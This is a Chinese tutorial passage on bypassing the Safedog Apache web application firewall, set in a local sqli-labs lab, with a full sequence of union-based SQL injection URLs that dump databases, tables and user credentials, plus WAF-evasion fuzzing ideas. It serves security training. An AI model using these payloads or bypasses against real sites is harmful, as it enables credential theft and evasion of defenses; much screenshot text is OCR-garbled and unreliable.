SQL注入 安全狗apache3.5.12048版本绕过(上)

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
日志服务 SLS,月写入数据量 50GB 1个月
简介: SQL注入 安全狗apache3.5.12048版本绕过

0x01 waf

安全狗 safedogwzApacheV3.5.exe

image.png

网站安全狗CAPACH版)43.5正式版本

加入服云

e网站安全狗

网马查杀

IP黑白名单

资源保护

主动防御

防护日志

流里保护

防护日志功能

已开启

保存

日主悼存干粉.

30

关于网站安全狗

日志类型:所有类型

当前版本:V3.5正式版本

时间

厦门服云信息科技有限公司("安全狗")是国内领先的云

t(schemaname)frominformati...

2021-04-1323:12:54网站漏洞

安全服务与解决方案提供商,兼承"安全狗即服务"(Safedog

e

a5aService)的理念,依托全球领先的安全技术与完善的大

网站漏洞

Iandor方式注入规则二可疑内容...

2021-0

数据处理平台,致力于为各行业客户提供最具核心竞争力的云

安全产品及解决方案,助力客户保障业务平台的安全,稳定

可靠运行

版权所有:厦门服云信息科技有限公司

确定

总记录数:2

下一页

当前页:1

跳至

上一页

总页数:1

确认

检查更新

网马库版本:2016-01-15

主程序版本:3.5,12048


0x02 搭建


网站:apache+mysql+php

phpstudy2018

php版本4.4.45

sqli-labs

image.png

phpStudy2018PHP-5.4.45

运行状态

phpStudy启停

Apache:

停止

启动

重启

MySQL:

提示信息

切换版本

运行模式

Apache已经停止...

22:13:39

系统服务

22:13:39

MVSQL已经停止...

22:13:39

正在启动进程...

非服务模式

22:13:40

Apache已经启动...

应用

22:13:40

MySOL已经启动...

MVSQL管理器

打开工具箱

其他选项菜单

快捷键配置


0x03  报错注入


关键句

select schema_name from information_schema.schemata;
select table_name from information_schema.tables where table_schema='security';
select column_name from information_schema.columns where table_name='users';
select username,password from security.users;


手动注入


查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema='security'
查列:select column_name from information_schema.columns where table_name='users'
查字段:select username,password from security.users



(下面的内容不要直接复制)
http://127.0.0.1/sqli/Less-1/?id=1’     查看是否有注入
http://127.0.0.1/sqli/Less-1/?id=1‘ order by 3--+   查看有多少列
http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,3--+ 查看哪些数据可以回显
http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,database()--+  查看当前数据库
http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,schema_name from information_schema.schemata limit 4,1--+  查看数据库security
或者是:
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 查看所有的数据库
http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表,
或者是:
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的
http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,column_name from information_schema.columns where table_name=0x7573657273--+ 查询列信息
或者是:
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+ 查看所以的列信息
http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,concat_ws(’~‘,username,password) from security.users limit 1,1--+ 查询一个账号和密码
或者是:http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+  直接可以得到所有的账号和密码,
并且使用~符号进行分割。


image.png

WelcomeDhakkan

YourLoginname:2

YourPassword:Dumb~Dumb.Angelina~l-ill

YUDUMTYPEOGSURYRROUBAMROBMYMAMURALAM?)

SQLIDUMBSEROBS

回控制台D调试器你网络门祥式综辑器性能

日存储前无障碍环境

查右器

照应用程序

0内存

AdblockPlus

HackTooks

HackBar

Encryption

EncodingsQLxssOther

Contributenow!HackBar2

LOaDURL

htp/0211559m

SPMfURL

Execute

OPostdataORefererOUserAgentocooklesClearA


工具注入


image.png

python31-errorgetinjctin

该ur[可注入,且一共存在3列

该url的数据库是:informationschem,chalteneqceceuy

该url中security所对应的表为:emails,referers,uagt,

该url中users所对应的字段值为:

Dm:mt.meLmH

minadmin,minmm


0x04 安全狗安装


image.png

网站安全狗(APACHE版)安装程序

APACHE的相关信息确定.注意事项:

1,请保证主配置目录有写权限,则会导致安装失败

2,请使用绝对路径形式.

3.服务名区分大小写?

4.请保证与你选择的安装包的Apache版本一致,否则会出现安装不正常

APACHE安装目录:

c:iphpstudy2018/phptutoriallapache

浏览

ServerRoot路径:

c:iphpstudy2018/phptutorial/apache

浏览

主配置路径:

c:/iphpstudy2018/phptutoriallapache/conf/ht.conf

浏览

主程序路径:

C:iphpstudy2018/phptutoriallapache/bin/httdexe

服务名:

版本的系列:

Apache2.0系列

Apache2.4系列

Apache2.2系列

确定


在安装的时候提示有一个服务名不能为空,这里需要phpstudy调整至系统服务模式。


image.png

PHP-5.4.45

phpStudy2018

运行状态

phpStudy启停

Apache:

重启

停止

启动

MySQL:

运行箱式

切场版本

提示信息

22:13:39

Apache已经停止...

系统服务

22:13:39

MySOL已经停止...

22:13:39

正在启动进程...

非服务模式

22:13:40

Apache已经启动...

应用

MySOL已经启动...

22:13:40

MVSQL管理器

其他选项菜单

快捷键配置

打开工具箱


然后调出任务管理器界面,查看所有服务


image.png

服务(本地)

登录为

描述

启动类型

名称

状态

apache

ActiveXInstaller(AxlnstSV

为...

手动

本地...

启动此服务

1

Adan+ivaDriabtnecc

木th

自动

本地.

iapache

描述:

确...

手动

本地...

ApplicationIdentity

Apache/2.4.23

手动

本地...

使...

透ApplicationInformation

Win32

为I...

手动

本地...

ApplicationLayerGatewayService

手动

使...

本地...

BackgroundIntelligentTransferService

BaseFilteringEngine

基...已.

本地...

自动

手动

BitLockerDriveEncryptionService

本地...

BD...

BlockLevelBackupEng

Wi...

本地...

EngineService

Blu...

本地...

BluetoothSupportService

将...

本地...

CertificatePropagation

手动

CNGKeyIsolation

CN...

本地...

支...

本地...

COM

EventSystem

自动

管...已...手动

COM+SystemApplication

本地...

维...已...手动

本地...

ComputerBrowser

为...

本地...

手动

CredentialManager

提...

自动

aCryptographicServices

网络...

自动

DC...

DCOMServerProcessLauncher

本地...

DesktopWindowManagerSessionMa...提...已...

本地...

自动

为...已...

DHCPClient

自动

本地...

DiagnosticPolicyService

本地...

诊...已...自动

本地...

诊...已...手动

DiagnosticServiceHost

本地...

诊...已...手动

DiagnosticSystemHost

image.png

网站安全狗(APACHE版)3.5正式版本

加入服云

双M

e

网站安全狗

请佳

资源保护IP黑白名单

网马查杀

主动防御

流量保护

防护日志

主动防御

您还未对服务器进行过网马扫描,建议立即扫描.

网站漏洞防护

已开启

规则设置

上次扫描时间:未扫描.

网马防护

规则设置

全站扫描

流量保护

扫描所有网站,更全面更安全

CC攻击防主

00000

已开启

规则设置

资源防护

自定义网站扫描

e

网站资源防盗链

扫描关键性网站,快速安全

已开启

规则设置

网站特定资源保护

已开启

规则设置

自定义路径扫描

网站后台防护

已开启

扫描关键路径,快速安全

规则设置

IP黑白名单

扫描设置

定时扫描

IP白名单

已开启

规则设置

IP黑名单

已开启

上报木马

查看隔离记录

查看历史记录

规则设置

网马库版本:2016-01-15

检查更新

主程序版本:3.5,12048


将服务写上,安装成功之后,注意不要选择在线安装服务器安全狗,安装之后会显示启动web服务失败,这里将phpstudy重启即可


使用恶意的参数进行测试下,安全狗生效


image.png

.

10.211.55.9/Less-1/id-'and1-1--+

ABP

Bing

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

1)检查提交内容;

2)如网站托管,请联系空间提供商;

3)普通网站访客,请联系网站管理员;

安全狗-网站安全专家

其他人怎么说?

日存储

日控制台D调试器1网络门样式编辑器

一无障碍环境

0内存

查看器

口性能

应用程序

AdblockPlus

HackBar

HackTools

EncodingsQLxssOther

Contribu

Encryptlon

http://10.211.55.9/L/1

LoaDURL

SplitURL


运行脚本:

image.png

inje

python301

jection.py

get

error

该url可注入,且一共存在3列

Traceback(mostrecentcattlast):

File

"1errorgetinjctioi

main()

File"ol_error_get_injctiny

line115inmain

print(该url的数据库是:',database_re[o])

listindexoutofrange

IndexError:


网站防护日志:

image.png

网站安全狗APACHE版)3.5正式版本

加入服云

MA

网站安全狗

精尔

资源保护

网马查杀

IF黑白名单

防护日志

流里保护

主动防御

防护日志功能

保存

日志保存天数:

30

已开启

所有类型

查询

记录时间:丛

删除日志

日志类型:

2021/4/13

2022/4/13

类型

内容保护

时间

QL合查询可第内客unonselctgun

2021-04-1323:12:54网漏洞防护

10211552间10211559

2021-04-1323:11:18网站漏洞防护

下一页

总页数:1当前页:1总记录数:2

确认

跳至

上一页

网马库版本:2016-01-15

检查更新

主程序版本:3.5.12048


0x05 Fuzz


在mysql的fuzz里面一般有以下的思路:(不止)


使用大小写绕过
使用/**/注释符绕过
使用大的数据包绕过
使用/!**/注释符绕过
……

1. 测试单引号

http://10.211.55.9/Less-1/?id=1'显示正常


image.png

E

10.211.55.9/Less-1/id-1

移动设备

Bing

Dhakkan

Welcome

headusq

SQLIDUMBSBROBS

D

日存储

器你网络

查右器日控制台D调试器

骨样式编辑器

内存

AdblockPlus

性能

应用程序

无吃碍环境

HackTools

HackBar

ContributenowlHacke

EncryptionEncodingsoL-xss,Other

http://10.211.55.9/Less-/i

LoadURL

SpltURL


http://10.211.55.9/Less-1/?id=1' --+ 显示正常


image.png

10.211.55.9/Less-1/2id1--

冰印

GeuBing

Welcome

Dhakkan

YourLoginname:Dumb

YourPassword:Dumb

SQLIDUMBSHRY

1网络

粤样式编辑器

日存储

性能

0内存

调试器

查看器

A

无障碍环境

应用程序

控制台

HackBarABPAdblockPlus

DevToolsPaneladdedby"HackBar"add-on.

XSS

Other

SQL

Encryption

Encoding

http://10.211.55.9/Less-1/?id-

LoadURL

SplitURl

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
15天前
|
SQL 存储 Apache
Apache Doris 3.0.3 版本正式发布
亲爱的社区小伙伴们,Apache Doris 3.0.3 版本已于 2024 年 12 月 02 日正式发布。该版本进一步提升了系统的性能及稳定性,欢迎大家下载体验。
|
28天前
|
Dubbo 安全 应用服务中间件
Apache Dubbo 正式发布 HTTP/3 版本 RPC 协议,弱网效率提升 6 倍
在 Apache Dubbo 3.3.0 版本之后,官方推出了全新升级的 Triple X 协议,全面支持 HTTP/1、HTTP/2 和 HTTP/3 协议。本文将围绕 Triple 协议对 HTTP/3 的支持进行详细阐述,包括其设计目标、实际应用案例、性能测试结果以及源码架构分析等内容。
|
2月前
|
前端开发 Java API
Apache Seata(incubating) 首个版本重磅发布!
2.1.0 是 Seata 进入 Apache 基金会的第一个 Release Version。此次发布将 io.seata 包名更改为 org.apache.seata。除了按原有的 Roadmap 技术演进外,2.1.0 进行了大量兼容性工作,实现了 API、数据和协议的兼容。用户无需修改原有的 API 和配置,即可实现到 Apache 版本的平滑升级。
124 16
Apache Seata(incubating) 首个版本重磅发布!
|
1月前
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
53 2
|
1月前
|
SQL 存储 Java
Apache Doris 2.1.7 版本正式发布
亲爱的社区小伙伴们,**Apache Doris 2.1.7 版本已于 2024 年 11 月 10 日正式发布。**2.1.7 版本持续升级改进,同时在湖仓一体、异步物化视图、半结构化数据管理、查询优化器、执行引擎、存储管理、以及权限管理等方面完成了若干修复。欢迎大家下载使用。
|
2月前
|
SQL 监控 测试技术
SQL现在到哪个版本及版本更新技巧与方法
SQL(Structured Query Language)作为数据库管理和操作的标准语言,随着技术的不断进步和数据库管理系统(DBMS)的持续发展,其版本也在不断更新和完善
|
2月前
|
存储 SQL 缓存
Apache Doris 3.0 里程碑版本|存算分离架构升级、湖仓一体再进化
从 3.0 系列版本开始,Apache Doris 开始支持存算分离模式,用户可以在集群部署时选择采用存算一体模式或存算分离模式。基于云原生存算分离的架构,用户可以通过多计算集群实现查询负载间的物理隔离以及读写负载隔离,并借助对象存储或 HDFS 等低成本的共享存储系统来大幅降低存储成本。
Apache Doris 3.0 里程碑版本|存算分离架构升级、湖仓一体再进化
|
2月前
|
SQL Oracle 关系型数据库
SQL数据库当前版本概览与更新趋势
在探讨SQL(Structured Query Language)数据库的当前版本时,我们首先要明确的是,SQL本身是一种查询语言标准,而并非特指某一个具体的数据库产品
|
1月前
|
SQL 关系型数据库 MySQL
MySql5.6版本开启慢SQL功能-本次采用永久生效方式
MySql5.6版本开启慢SQL功能-本次采用永久生效方式
43 0
|
3月前
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
142 5

热门文章

最新文章

推荐镜像

更多